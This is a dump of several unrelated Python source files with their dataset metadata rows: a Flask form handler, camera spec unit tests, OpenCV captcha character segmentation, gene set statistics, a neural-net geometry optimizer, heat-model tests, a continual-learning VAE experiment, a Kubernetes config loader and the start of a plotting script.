# db.session.commit()
body = """
Thank you {} for filling the form!😊
""".format(form.name.data)
msg = Message(subject="survey form", sender='', recipients=[form.email.data], body=body)
mail.send(msg)
flash('Your feedback is successfully submitted!!', 'success')
return redirect(url_for('thank'))
return render_template('form.html', form=form)
@app.route('/thank')
def thank():
return render_template('thank.html')
| 32.033333
| 97
| 0.632674
| 0
| 0
| 0
| 0
| 727
| 0.754149
| 0
| 0
| 320
| 0.33195
|
35f622ff3fa5187c3265b7d1252636eaf5af175d
| 5,708
|
py
|
Python
|
tests/test_camera.py
|
Gokender/kameramera
|
7ebd9a196809c1e7ab117bb11b90bcea8d1eb8e7
|
[
"MIT"
] | null | null | null |
tests/test_camera.py
|
Gokender/kameramera
|
7ebd9a196809c1e7ab117bb11b90bcea8d1eb8e7
|
[
"MIT"
] | null | null | null |
tests/test_camera.py
|
Gokender/kameramera
|
7ebd9a196809c1e7ab117bb11b90bcea8d1eb8e7
|
[
"MIT"
] | null | null | null |
import unittest
from kameramera import camera
class Camera(unittest.TestCase):
def setUp(self):
self.camera = camera.Camera(camera_id='canon_ae1')
def test_general_manufacturer(self):
self.assertEqual(self.camera.general.manufacturer, 'Canon')
def test_general_name(self):
self.assertEqual(self.camera.general.name, 'Canon AE-1')
def test_general_type(self):
self.assertEqual(self.camera.general.type, 'SLR')
def test_general_format(self):
self.assertEqual(self.camera.general.format, '24x35')
def test_general_made_in(self):
self.assertEqual(self.camera.general.made_in, 'Japan')
def test_general_date(self):
self.assertEqual(self.camera.general.date, '1976-1984')
def test_general_body_construction(self):
self.assertEqual(self.camera.general.body_construction, 'metal')
def test_general_mount_threads(self):
self.assertEqual(self.camera.general.mount_threads, '1/4"')
def test_general_dimension(self):
self.assertEqual(self.camera.general.dimension, '141x87x47.5 mm')
def test_general_weight(self):
self.assertEqual(self.camera.general.weight, '620g')
def test_optics_lenses(self):
self.assertEqual(self.camera.optics.lenses, 'interchangeable')
def test_optics_lenses_mount(self):
self.assertEqual(self.camera.optics.lenses_mount, 'Canon FD')
def test_sighting_type(self):
self.assertEqual(self.camera.sighting.type, 'fixed eye-level pentaprism')
def test_sighting_display(self):
self.assertEqual(self.camera.sighting.display, False)
def test_sighting_viewfinder_rangefinder(self):
self.assertEqual(self.camera.sighting.viewfinder.rangefinder,
['split_image', 'microprism'])
def test_sighting_viewfinder_aperture(self):
self.assertEqual(self.camera.sighting.viewfinder.aperture, True)
def test_sighting_viewfinder_exposure_indicator(self):
self.assertEqual(self.camera.sighting.viewfinder.exposure_indicator, True)
def test_sighting_viewfinder_flash_indicator(self):
self.assertEqual(self.camera.sighting.viewfinder.flash_indicator, True)
def test_focus_manual(self):
self.assertEqual(self.camera.focus.manual, True)
def test_focus_autofocus(self):
self.assertEqual(self.camera.focus.autofocus, False)
def test_focus_stabilization(self):
self.assertEqual(self.camera.focus.stabilization, False)
def test_focus_depth_of_field(self):
self.assertEqual(self.camera.focus.depth_of_field, True)
def test_shutter_type(self):
self.assertEqual(self.camera.shutter.type, None)
def test_shutter_shutter_speeds(self):
self.assertEqual(self.camera.shutter.shutter_speeds, [
'2',
'1',
'1/2',
'1/4',
'1/8',
'1/15',
'1/30',
'1/60',
'1/125',
'1/250',
'1/500',
'1/1000'
])
def test_shutter_pose(self):
self.assertEqual(self.camera.shutter.pose, 'B')
def test_shutter_self_timer(self):
self.assertEqual(self.camera.shutter.self_timer, 10)
def test_exposure_mode(self):
self.assertEqual(self.camera.exposure.mode, ['M','S'])
def test_exposure_correction(self):
self.assertEqual(self.camera.exposure.correction, 1.5)
def test_exposure_measure_type(self):
self.assertEqual(self.camera.exposure.measure.type, 'TTL')
def test_exposure_measure_light_sensor(self):
self.assertEqual(self.camera.exposure.measure.light_sensor,
'silicon photon cell')
def test_exposure_measure_metering_mode(self):
self.assertEqual(self.camera.exposure.measure.metering_mode,
'center-weighted average metering')
def test_exposure_measure_memory(self):
self.assertEqual(self.camera.exposure.measure.memory, True)
def test_film_format(self):
self.assertEqual(self.camera.film.format, 135)
def test_film_advance(self):
self.assertEqual(self.camera.film.advance, 'manual')
def test_film_frame_counter(self):
self.assertEqual(self.camera.film.frame_counter, True)
def test_film_film_speed(self):
self.assertEqual(self.camera.film.film_speed, [
25,
32,
40,
50,
64,
80,
100,
125,
160,
200,
250,
320,
400,
500,
640,
800,
1000,
1250,
1600,
2000,
2500,
3200
])
def test_flash_built_in(self):
self.assertEqual(self.camera.flash.built_in, False)
def test_flash_hot_shoe(self):
self.assertEqual(self.camera.flash.hot_shoe, True)
def test_flash_synchronization(self):
self.assertEqual(self.camera.flash.synchronization, '1/60')
def test_power_required(self):
self.assertEqual(self.camera.power.required, True)
def test_power_source_number(self):
self.assertEqual(self.camera.power.source[0].number, 1)
def test_power_source_voltage(self):
self.assertEqual(self.camera.power.source[0].voltage, 6)
def test_power_source_type(self):
self.assertEqual(self.camera.power.source[0].type, [
'alkaline-manganese',
'silver oxyde',
'lithium'
])
| 31.711111
| 82
| 0.637176
| 5,659
| 0.991416
| 0
| 0
| 0
| 0
| 0
| 0
| 369
| 0.064646
|
35f678cde08c5ff864121819c46adfa1fdba45f0
| 887
|
py
|
Python
|
app/coordinates.py
|
krasch/simply_landmarks
|
8a5c3f2ff476377e44646a00e61b8287a53260e3
|
[
"MIT"
] | 14
|
2020-02-03T22:30:48.000Z
|
2021-11-01T09:41:34.000Z
|
app/coordinates.py
|
krasch/simply_landmarks
|
8a5c3f2ff476377e44646a00e61b8287a53260e3
|
[
"MIT"
] | 3
|
2020-11-28T17:24:28.000Z
|
2022-01-26T19:56:35.000Z
|
app/coordinates.py
|
krasch/simply_landmarks
|
8a5c3f2ff476377e44646a00e61b8287a53260e3
|
[
"MIT"
] | 4
|
2020-10-11T21:26:53.000Z
|
2021-09-14T03:59:20.000Z
|
from pathlib import Path
from PIL import Image
# coordinates are sent as slightly weird URL parameters (e.g. 0.png?214,243)
# parse them, will crash server if they are coming in unexpected format
def parse_coordinates(args):
keys = list(args.keys())
assert len(keys) == 1
coordinates = keys[0]
assert len(coordinates.split(",")) == 2
x, y = coordinates.split(",")
x = int(x)
y = int(y)
return x, y
# image was not displayed in original size -> need to convert the coordinates
def init_scale_coordinates(image_dir: str, scaled_height: int):
image_dir = Path(image_dir)
def perform_scaling(image: str, x: int, y: int):
image = Image.open(str(image_dir / image))
original_width, original_height = image.size
scale = original_height / scaled_height
return int(x*scale), int(y*scale)
return perform_scaling
| 27.71875
| 77
| 0.67982
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 230
| 0.259301
|
35f6bdfd466ccfcc3ec731821bd0d70b92cb5b92
| 2,851
|
py
|
Python
|
lib/tool_images.py
|
KTingLee/image-training
|
c02c7caa81a55b61e935d07ead27bcaed468eb0a
|
[
"MIT"
] | null | null | null |
lib/tool_images.py
|
KTingLee/image-training
|
c02c7caa81a55b61e935d07ead27bcaed468eb0a
|
[
"MIT"
] | 2
|
2021-01-22T09:10:33.000Z
|
2021-01-22T14:22:09.000Z
|
lib/tool_images.py
|
KTingLee/image-training
|
c02c7caa81a55b61e935d07ead27bcaed468eb0a
|
[
"MIT"
] | 1
|
2021-01-22T08:56:34.000Z
|
2021-01-22T08:56:34.000Z
|
import matplotlib.pyplot as plt
import numpy as np
import math
import cv2
kernel = np.ones((3, 3), np.int8)
# 去除雜訊
def eraseImage (image):
return cv2.erode(image, kernel, iterations = 1)
# 模糊圖片
def blurImage (image):
return cv2.GaussianBlur(image, (5, 5), 0)
# 銳利化圖片
# threshold1,2,較小的值為作為偵測邊界的最小值
def edgedImage (image, threshold1 = 30, threshold2 = 150):
return cv2.Canny(image, threshold1, threshold2)
# 圖片膨脹
def dilateImage (image, level = (3, 3)):
level = np.ones(level, np.int8)
return cv2.dilate(image, level, iterations = 1)
# 獲得字元外盒
def getCharBox (image, minW = 15, minH = 15):
def setBoundingBox (contours):
box = []
for cnt in contours:
(x, y, w, h) = cv2.boundingRect(cnt)
# NOTE: 字元有一定大小,所以其盒子寬高也有基本門檻值
if w > minW and h > minH:
box.append((x, y, w, h))
# cv2.rectangle(image, (x, y), (x + w, y + h), (127, 255, 0), 2) # 依照contour畫邊界
# cv2.imshow('test', image)
return box
def removeInnerBox (boxes):
# 對各個字元的外盒,依照 x 大小排列
boxes.sort(key = lambda e: e[0])
results = [boxes[0]]
for i in range(len(boxes) - 1):
x1, y1, w1, h1 = boxes[i]
x2, y2, w2, h2 = boxes[i+1]
if (x2 > x1 and x2 + w2 > x1 + w1):
results.append(boxes[i+1])
return results
contours, hierarchy = cv2.findContours(image, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
boundingBox = setBoundingBox(contours)
boundingBox = removeInnerBox(boundingBox)
return boundingBox
def showCharBox (image, boxes):
for x, y, w, h in boxes:
cv2.rectangle(image, (x, y), (x + w, y + h), (127, 255, 0), 2) # 依照contour畫邊界
cv2.imshow('charBox', image)
cv2.waitKey(0)
def showCountour (contours):
row = 2
col = math.ceil(len(contours)/row)
for i, cnt in enumerate(contours, start = 1):
x = []
y = []
# plt.subplot(row, col, i)
for point in cnt:
x.append(point[0][0])
y.append(point[0][1])
plt.plot(x, y)
plt.show()
def resizeImage (image, charBox, size = (50, 50)):
results = []
for (x, y, w, h) in charBox:
char = image[y:y+h, x:x+w]
char = cv2.resize(char, size)
results.append(char)
return results
def diffPictures (picA, picB):
err = np.sum( (picA.astype('float') - picB.astype('float')) ** 2 )
err /= float(picA.shape[0] * picA.shape[1])
return err
if __name__ == '__main__':
pic = cv2.imread('../captcha_Images/0.png')
print(pic)
cv2.imshow('pic', pic)
cv2.waitKey(0)
erosion = eraseImage(pic)
blured = blurImage(erosion)
edged = edgedImage(blured)
dilated = dilateImage(edged)
charBox = getCharBox(dilated)
showCharBox(dilated, charBox)
dilated = dilateImage(edged, (4, 4))
chars = resizeImage(dilated, charBox)
# input("Press Enter to continue.")
# c = result[0][0][0][0]
# print(c)
# plt.plot(c)
cv2.waitKey(0)
cv2.destroyAllWindows()
| 25.684685
| 88
| 0.62785
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 581
| 0.192193
|
35f6e6f91f9e05d76fd7957364cd9c3157a56978
| 2,965
|
py
|
Python
|
Code/geneset_testing.py
|
dylkot/EbolaSC
|
d363f9d2c10911f01c7b1d22fec2b192df2569b1
|
[
"MIT"
] | 2
|
2020-09-28T09:27:33.000Z
|
2021-01-04T09:16:42.000Z
|
Code/geneset_testing.py
|
dylkot/SC-Ebola
|
d363f9d2c10911f01c7b1d22fec2b192df2569b1
|
[
"MIT"
] | null | null | null |
Code/geneset_testing.py
|
dylkot/SC-Ebola
|
d363f9d2c10911f01c7b1d22fec2b192df2569b1
|
[
"MIT"
] | null | null | null |
import pandas as pd
import numpy as np
from scipy.stats import mannwhitneyu, fisher_exact, ranksums
def load_geneset(gmtfn, genes=None, minsize=0):
'''
Load genesets stored in gmt format (e.g. as provided by msigdb)
gmtfn : str
path to gmt file
genes : list, optional
only include genes in this input
minsize : int, optional
minimum geneset size to keep
Returns
-------
gsets : dict
gene_set_name : set of genes
allsetgenes : set
set of genes found in all genesets combined
'''
allsetgenes = set()
if genes is not None:
genes = set(genes)
gsets = {}
effect_min_size = minsize+2 # account for gset name cols
with open(gmtfn) as F:
for l in F.readlines():
words = [x for x in l.rstrip().split('\t')]
gsetname = words[0]
setgenes = words[2:]
if genes is not None:
setgenes = set(setgenes).intersection(genes)
else:
setgenes = set(setgenes[2:])
if len(setgenes) >= effect_min_size:
gsets[gsetname] = setgenes
allsetgenes = allsetgenes.union(setgenes)
return(gsets, allsetgenes)
def fishertestbygep(gsets, signatures):
cols = []
for sig in signatures.columns:
cols.append((sig, 'OR'))
cols.append((sig, 'P'))
res = pd.DataFrame(index=list(gsets.keys()), columns=pd.MultiIndex.from_tuples(cols))
total = res.shape[0]
N = signatures.shape[0]
for sig in signatures.columns:
print(sig)
siggenes = set(signatures.index[signatures[sig]])
for (count,gs) in enumerate(res.index):
(OR,P, table) = run_fisher_exact(siggenes, gsets[gs], N)
res.at[gs,(sig,'OR')]=OR
res.at[gs,(sig,'P')]=P
return(res)
def run_fisher_exact(siggenes, setgenes, num_total):
numinter = len(setgenes.intersection(siggenes))
numunion = len(setgenes.union(siggenes))
table = [[numinter, len(siggenes) - numinter],
[len(setgenes)-numinter, num_total-numunion]]
(OR,P) = fisher_exact(table, alternative='two-sided')
return(OR, P, table)
def ranksumtestbygep(gsets, signatures):
cols = []
for sig in signatures.columns:
cols.append((sig, 'H'))
cols.append((sig, 'P'))
res = pd.DataFrame(index=list(gsets.keys()), columns=pd.MultiIndex.from_tuples(cols))
total = res.shape[0]
for (count,gs) in enumerate(res.index):
if (count % 100) == 0:
print('%d out of %d' % (count, total))
ind = signatures.index.isin(gsets[gs])
for sig in signatures.columns:
x1 = signatures.loc[ind, sig].dropna()
x2 = signatures.loc[~ind, sig].dropna()
(H,P) = ranksums(x1, x2)
res.at[gs,(sig,'H')]=H
res.at[gs,(sig,'P')]=P
return(res)
| 29.949495
| 89
| 0.57774
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 518
| 0.174705
|
35f85f5cb5fab6226fab7a5a01b0882ca5ca7ca9
| 54
|
py
|
Python
|
tests/src/import_func.py
|
bayashi-cl/expander
|
b3623b656a71801233797e05781295a6101fefd8
|
[
"CC0-1.0"
] | null | null | null |
tests/src/import_func.py
|
bayashi-cl/expander
|
b3623b656a71801233797e05781295a6101fefd8
|
[
"CC0-1.0"
] | 1
|
2022-03-12T20:41:21.000Z
|
2022-03-13T06:34:30.000Z
|
tests/src/import_func.py
|
bayashi-cl/expander
|
b3623b656a71801233797e05781295a6101fefd8
|
[
"CC0-1.0"
] | null | null | null |
from testlib_a.main_a import print_name
print_name()
| 13.5
| 39
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
35f901a5b14d9bb965c94938ad6cacba20eb8f77
| 2,167
|
py
|
Python
|
nn_wtf/parameter_optimizers/brute_force_optimizer.py
|
lene/nn-wtf
|
4696f143d936e0c0c127847e3bb1e93a6e756d35
|
[
"Apache-2.0"
] | null | null | null |
nn_wtf/parameter_optimizers/brute_force_optimizer.py
|
lene/nn-wtf
|
4696f143d936e0c0c127847e3bb1e93a6e756d35
|
[
"Apache-2.0"
] | 20
|
2016-02-20T12:43:04.000Z
|
2016-12-23T13:57:25.000Z
|
nn_wtf/parameter_optimizers/brute_force_optimizer.py
|
lene/nn-wtf
|
4696f143d936e0c0c127847e3bb1e93a6e756d35
|
[
"Apache-2.0"
] | null | null | null |
import pprint
from nn_wtf.parameter_optimizers.neural_network_optimizer import NeuralNetworkOptimizer
__author__ = 'Lene Preuss <lene.preuss@gmail.com>'
class BruteForceOptimizer(NeuralNetworkOptimizer):
DEFAULT_LAYER_SIZES = (
(32, 48, 64), # (32, 48, 64, 80, 96, 128),
(32, 48, 64, 80, 96, 128),
(None, 16, 32, 48)
)
# self, tested_network, input_size, output_size, desired_training_precision,
def __init__(
self, tested_network, input_size, output_size, desired_training_precision,
layer_sizes=None, learning_rate=None, verbose=False, batch_size=100
):
super().__init__(
tested_network, input_size, output_size, desired_training_precision, verbose=verbose, batch_size=batch_size
)
self.learning_rate = learning_rate if learning_rate else self.DEFAULT_LEARNING_RATE
self.layer_sizes = self.DEFAULT_LAYER_SIZES if layer_sizes is None else layer_sizes
def best_parameters(self, data_sets, max_steps):
results = self.time_all_tested_geometries(data_sets, max_steps)
return results[0].optimization_parameters
def brute_force_optimal_network_geometry(self, data_sets, max_steps):
return self.best_parameters(data_sets, max_steps).geometry
def time_all_tested_geometries(self, data_sets, max_steps):
results = []
for geometry in self.get_network_geometries():
run_info = self.timed_run_training(
data_sets,
NeuralNetworkOptimizer.OptimizationParameters(geometry, self.learning_rate),
max_steps=max_steps
)
results.append(run_info)
results = sorted(results, key=lambda r: r.cpu_time)
if self.verbose: pprint.pprint(results, width=100)
return results
def get_network_geometries(self):
return ((l1, l2, l3)
for l1 in self.layer_sizes[0]
for l2 in self.layer_sizes[1] if l2 <= l1
for l3 in self.layer_sizes[2] if l3 is None or l3 <= l2)
def brute_force_optimize_learning_rate(self):
raise NotImplementedError()
| 38.696429
| 119
| 0.677434
| 2,008
| 0.926627
| 0
| 0
| 0
| 0
| 0
| 0
| 152
| 0.070143
|
35f926086eaca9043bf3f10e9c0ac0804430ebb4
| 1,856
|
py
|
Python
|
tests/test_get_value.py
|
mdpiper/bmi-example-python
|
e6b1e9105daef44fe1f0adba5b857cde1bbd032a
|
[
"MIT"
] | 3
|
2020-10-20T08:59:19.000Z
|
2021-10-18T17:57:06.000Z
|
tests/test_get_value.py
|
mdpiper/bmi-example-python
|
e6b1e9105daef44fe1f0adba5b857cde1bbd032a
|
[
"MIT"
] | 4
|
2019-04-19T20:07:15.000Z
|
2021-01-28T23:34:35.000Z
|
tests/test_get_value.py
|
mdpiper/bmi-example-python
|
e6b1e9105daef44fe1f0adba5b857cde1bbd032a
|
[
"MIT"
] | 7
|
2020-08-05T17:25:34.000Z
|
2021-09-08T21:38:33.000Z
|
#!/usr/bin/env python
from numpy.testing import assert_array_almost_equal, assert_array_less
import numpy as np
from heat import BmiHeat
def test_get_initial_value():
model = BmiHeat()
model.initialize()
z0 = model.get_value_ptr("plate_surface__temperature")
assert_array_less(z0, 1.0)
assert_array_less(0.0, z0)
def test_get_value_copy():
model = BmiHeat()
model.initialize()
dest0 = np.empty(model.get_grid_size(0), dtype=float)
dest1 = np.empty(model.get_grid_size(0), dtype=float)
z0 = model.get_value("plate_surface__temperature", dest0)
z1 = model.get_value("plate_surface__temperature", dest1)
assert z0 is not z1
assert_array_almost_equal(z0, z1)
def test_get_value_pointer():
model = BmiHeat()
model.initialize()
dest1 = np.empty(model.get_grid_size(0), dtype=float)
z0 = model.get_value_ptr("plate_surface__temperature")
z1 = model.get_value("plate_surface__temperature", dest1)
assert z0 is not z1
assert_array_almost_equal(z0.flatten(), z1)
for _ in range(10):
model.update()
assert z0 is model.get_value_ptr("plate_surface__temperature")
def test_get_value_at_indices():
model = BmiHeat()
model.initialize()
dest = np.empty(3, dtype=float)
z0 = model.get_value_ptr("plate_surface__temperature")
z1 = model.get_value_at_indices("plate_surface__temperature", dest, [0, 2, 4])
assert_array_almost_equal(z0.take((0, 2, 4)), z1)
def test_value_size():
model = BmiHeat()
model.initialize()
z = model.get_value_ptr("plate_surface__temperature")
assert model.get_grid_size(0) == z.size
def test_value_nbytes():
model = BmiHeat()
model.initialize()
z = model.get_value_ptr("plate_surface__temperature")
assert model.get_var_nbytes("plate_surface__temperature") == z.nbytes
| 24.746667
| 82
| 0.715517
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 329
| 0.177263
|
35fac5891884a7fafbd906447065470f94dbe9cf
| 9,158
|
py
|
Python
|
tensorflow/dgm/exp.py
|
goldfarbDave/vcl
|
24fb33a1dcadfa6c6cf5e9e9838b64f4fd23143a
|
[
"Apache-2.0"
] | null | null | null |
tensorflow/dgm/exp.py
|
goldfarbDave/vcl
|
24fb33a1dcadfa6c6cf5e9e9838b64f4fd23143a
|
[
"Apache-2.0"
] | null | null | null |
tensorflow/dgm/exp.py
|
goldfarbDave/vcl
|
24fb33a1dcadfa6c6cf5e9e9838b64f4fd23143a
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import tensorflow as tf
import sys, os
sys.path.extend(['alg/', 'models/'])
from visualisation import plot_images
from encoder_no_shared import encoder, recon
from utils import init_variables, save_params, load_params, load_data
from eval_test_ll import construct_eval_func
dimZ = 50
dimH = 500
n_channel = 128
batch_size = 50
lr = 1e-4
K_mc = 10
checkpoint = -1
def main(data_name, method, dimZ, dimH, n_channel, batch_size, K_mc, checkpoint, lbd):
# set up dataset specific stuff
from config import config
labels, n_iter, dimX, shape_high, ll = config(data_name, n_channel)
if data_name == 'mnist':
from mnist import load_mnist
if data_name == 'notmnist':
from notmnist import load_notmnist
# import functionalities
if method == 'onlinevi':
from bayesian_generator import generator_head, generator_shared, \
generator, construct_gen
from onlinevi import construct_optimizer, init_shared_prior, \
update_shared_prior, update_q_sigma
if method in ['ewc', 'noreg', 'laplace', 'si']:
from generator import generator_head, generator_shared, generator, construct_gen
if method in ['ewc', 'noreg']:
from vae_ewc import construct_optimizer, lowerbound
if method == 'ewc': from vae_ewc import update_ewc_loss, compute_fisher
if method == 'laplace':
from vae_laplace import construct_optimizer, lowerbound
from vae_laplace import update_laplace_loss, compute_fisher, init_fisher_accum
if method == 'si':
from vae_si import construct_optimizer, lowerbound, update_si_reg
# then define model
n_layers_shared = 2
batch_size_ph = tf.placeholder(tf.int32, shape=(), name='batch_size')
dec_shared = generator_shared(dimX, dimH, n_layers_shared, 'sigmoid', 'gen')
# initialise sessions
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
string = method
if method in ['ewc', 'laplace', 'si']:
string = string + '_lbd%.1f' % lbd
if method == 'onlinevi' and K_mc > 1:
string = string + '_K%d' % K_mc
path_name = data_name + '_%s/' % string
if not os.path.isdir('save/'):
os.mkdir('save/')
if not os.path.isdir('save/'+path_name):
os.mkdir('save/'+path_name)
print('create path save/' + path_name)
filename = 'save/' + path_name + 'checkpoint'
if checkpoint < 0:
print('training from scratch')
old_var_list = init_variables(sess)
else:
load_params(sess, filename, checkpoint)
checkpoint += 1
# visualise the samples
N_gen = 10**2
path = 'figs/' + path_name
if not os.path.isdir('figs/'):
os.mkdir('figs/')
if not os.path.isdir(path):
os.mkdir(path)
print('create path ' + path)
X_ph = tf.placeholder(tf.float32, shape=(batch_size, dimX), name = 'x_ph')
# now start fitting
N_task = len(labels)
gen_ops = []
X_valid_list = []
X_test_list = []
eval_func_list = []
result_list = []
if method == 'onlinevi':
shared_prior_params = init_shared_prior()
if method in ['ewc', 'noreg']:
ewc_loss = 0.0
if method == 'laplace':
F_accum = init_fisher_accum()
laplace_loss = 0.0
if method == 'si':
old_params_shared = None
si_reg = None
n_layers_head = 2
n_layers_enc = n_layers_shared + n_layers_head - 1
for task in range(1, N_task+1):
# first load data
if data_name == 'mnist':
X_train, X_test, _, _ = load_mnist(digits = labels[task-1], conv = False)
if data_name == 'notmnist':
X_train, X_test, _, _ = load_notmnist(digits = labels[task-1], conv = False)
N_train = int(X_train.shape[0] * 0.9)
X_valid_list.append(X_train[N_train:])
X_train = X_train[:N_train]
X_test_list.append(X_test)
# define the head net and the generator ops
dec = generator(generator_head(dimZ, dimH, n_layers_head, 'gen_%d' % task), dec_shared)
enc = encoder(dimX, dimH, dimZ, n_layers_enc, 'enc_%d' % task)
gen_ops.append(construct_gen(dec, dimZ, sampling=False)(N_gen))
print('construct eval function...')
eval_func_list.append(construct_eval_func(X_ph, enc, dec, ll, \
batch_size_ph, K = 100, sample_W = False))
# then construct loss func and fit func
print('construct fit function...')
if method == 'onlinevi':
fit = construct_optimizer(X_ph, enc, dec, ll, X_train.shape[0], batch_size_ph, \
shared_prior_params, task, K_mc)
if method in ['ewc', 'noreg']:
bound = lowerbound(X_ph, enc, dec, ll)
fit = construct_optimizer(X_ph, batch_size_ph, bound, X_train.shape[0], ewc_loss)
if method == 'ewc':
fisher, var_list = compute_fisher(X_ph, batch_size_ph, bound, X_train.shape[0])
if method == 'laplace':
bound = lowerbound(X_ph, enc, dec, ll)
fit = construct_optimizer(X_ph, batch_size_ph, bound, X_train.shape[0], laplace_loss)
fisher, var_list = compute_fisher(X_ph, batch_size_ph, bound, X_train.shape[0])
if method == 'si':
bound = lowerbound(X_ph, enc, dec, ll)
fit, shared_var_list = construct_optimizer(X_ph, batch_size_ph, bound, X_train.shape[0],
si_reg, old_params_shared, lbd)
if old_params_shared is None:
old_params_shared = sess.run(shared_var_list)
# initialise all the uninitialised stuff
old_var_list = init_variables(sess, old_var_list)
# start training for each task
if method == 'si':
new_params_shared, w_params_shared = fit(sess, X_train, n_iter, lr)
else:
fit(sess, X_train, n_iter, lr)
# plot samples
x_gen_list = sess.run(gen_ops, feed_dict={batch_size_ph: N_gen})
for i in range(len(x_gen_list)):
plot_images(x_gen_list[i], shape_high, path, \
data_name+'_gen_task%d_%d' % (task, i+1))
x_list = [x_gen_list[i][:1] for i in range(len(x_gen_list))]
x_list = np.concatenate(x_list, 0)
tmp = np.zeros([10, dimX])
tmp[:task] = x_list
if task == 1:
x_gen_all = tmp
else:
x_gen_all = np.concatenate([x_gen_all, tmp], 0)
# print test-ll on all tasks
tmp_list = []
for i in range(len(eval_func_list)):
print('task %d' % (i+1), end=' ')
test_ll = eval_func_list[i](sess, X_valid_list[i])
tmp_list.append(test_ll)
result_list.append(tmp_list)
# save param values
save_params(sess, filename, checkpoint)
checkpoint += 1
# update regularisers/priors
if method == 'ewc':
# update EWC loss
print('update ewc loss...')
X_batch = X_train[np.random.permutation(list(range(X_train.shape[0])))[:batch_size]]
ewc_loss = update_ewc_loss(sess, ewc_loss, var_list, fisher, lbd, X_batch)
if method == 'laplace':
# update EWC loss
print('update laplace loss...')
X_batch = X_train[np.random.permutation(list(range(X_train.shape[0])))[:batch_size]]
laplace_loss, F_accum = update_laplace_loss(sess, F_accum, var_list, fisher, lbd, X_batch)
if method == 'onlinevi':
# update prior
print('update prior...')
shared_prior_params = update_shared_prior(sess, shared_prior_params)
# reset the variance of q
update_q_sigma(sess)
if method == 'si':
# update regularisers/priors
print('update SI big omega matrices...')
si_reg, _ = update_si_reg(sess, si_reg, new_params_shared, \
old_params_shared, w_params_shared)
old_params_shared = new_params_shared
plot_images(x_gen_all, shape_high, path, data_name+'_gen_all')
for i in range(len(result_list)):
print(result_list[i])
# save results
if not os.path.isdir("results/"):
os.mkdir("results/")
fname = 'results/' + data_name + '_%s.pkl' % string
import pickle
with open(fname, 'wb') as f:
pickle.dump(result_list, f)
print('test-ll results saved in', fname)
if __name__ == '__main__':
data_name = str(sys.argv[1])
method = str(sys.argv[2])
assert method in ['noreg', 'laplace', 'ewc', 'si', 'onlinevi']
if method == 'onlinevi':
lbd = 1.0 # some placeholder, doesn't matter
else:
lbd = float(sys.argv[3])
main(data_name, method, dimZ, dimH, n_channel, batch_size, K_mc, checkpoint, lbd)
| 40.166667
| 102
| 0.597183
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,298
| 0.141734
|
35fb641cc4c232d5e95579ae3bf4fec4904fbdf7
| 1,663
|
py
|
Python
|
src/cltl/combot/infra/config/k8config.py
|
leolani/cltl-combot
|
7008742ba9db782166f79322658a8cb49890d61b
|
[
"MIT"
] | 1
|
2020-11-21T18:53:22.000Z
|
2020-11-21T18:53:22.000Z
|
src/cltl/combot/infra/config/k8config.py
|
leolani/cltl-combot
|
7008742ba9db782166f79322658a8cb49890d61b
|
[
"MIT"
] | null | null | null |
src/cltl/combot/infra/config/k8config.py
|
leolani/cltl-combot
|
7008742ba9db782166f79322658a8cb49890d61b
|
[
"MIT"
] | null | null | null |
import logging
import os
import cltl.combot.infra.config.local as local_config
logger = logging.getLogger(__name__)
K8_CONFIG_DIR = "/cltl_k8_config"
K8_CONFIG = "config/k8.config"
class K8LocalConfigurationContainer(local_config.LocalConfigurationContainer):
@staticmethod
def load_configuration(config_file=local_config.CONFIG, additional_config_files=local_config.ADDITIONAL_CONFIGS,
k8_configs=K8_CONFIG_DIR, k8_config_file=K8_CONFIG):
configs = additional_config_files
try:
copy_k8_config(k8_configs, k8_config_file)
configs += [k8_config_file]
except OSError:
logger.warning("Could not load kubernetes config map from %s to %s", k8_configs, k8_config_file)
local_config.LocalConfigurationContainer.load_configuration(config_file, configs)
def copy_k8_config(k8_config_dir, k8_config_file):
k8_configs = tuple(file for file in os.listdir(k8_config_dir) if not file.startswith("."))
logger.debug("Found kubernetes config maps %s in %s", k8_configs, k8_config_dir)
k8_sections = {section: _read_config(k8_config_dir, section)
for section in k8_configs}
with open(k8_config_file, 'w') as k8_cfg:
logger.info("Writing %s", k8_cfg)
for section_name, section_values in k8_sections.items():
k8_cfg.write(f"[{section_name}]\n")
k8_cfg.write(section_values)
k8_cfg.write("\n")
def _read_config(k8_configs, config_file):
logger.info("Loading %s/%s", k8_configs, config_file)
with open(os.path.join(k8_configs, config_file)) as cfg:
return cfg.read()
| 36.955556
| 116
| 0.710764
| 667
| 0.401082
| 0
| 0
| 584
| 0.351173
| 0
| 0
| 184
| 0.110643
|
35fb6a7aec8441ab62bd7a834d5a31a1a31bbbcf
| 17,640
|
py
|
Python
|
act_map/scripts/exp_compare_diff_maps.py
|
debugCVML/rpg_information_field
|
56f9ffba83aaee796502116e1cf651c5bc405bf6
|
[
"MIT"
] | 149
|
2020-06-23T12:08:47.000Z
|
2022-03-31T08:18:52.000Z
|
act_map/scripts/exp_compare_diff_maps.py
|
debugCVML/rpg_information_field
|
56f9ffba83aaee796502116e1cf651c5bc405bf6
|
[
"MIT"
] | 4
|
2020-08-28T07:51:15.000Z
|
2021-04-09T13:18:49.000Z
|
act_map/scripts/exp_compare_diff_maps.py
|
debugCVML/rpg_information_field
|
56f9ffba83aaee796502116e1cf651c5bc405bf6
|
[
"MIT"
] | 34
|
2020-06-26T14:50:34.000Z
|
2022-03-04T06:45:55.000Z
|
#!/usr/bin/env python
import os
import argparse
import yaml
import numpy as np
from colorama import init, Fore, Style
from matplotlib import rc
import matplotlib.pyplot as plt
import plot_utils as pu
init(autoreset=True)
rc('font', **{'serif': ['Cardo'], 'size': 20})
rc('text', usetex=True)
kMetrics = ['det', 'mineig', 'trace']
kMetricsLabels = ['$\det$', '$\lambda_{min}$', '${Tr}$']
kSecToUs = 1.0e6
kPallete = [
'blue', 'green', 'red', 'gold', 'purple', 'gray', 'cyan',
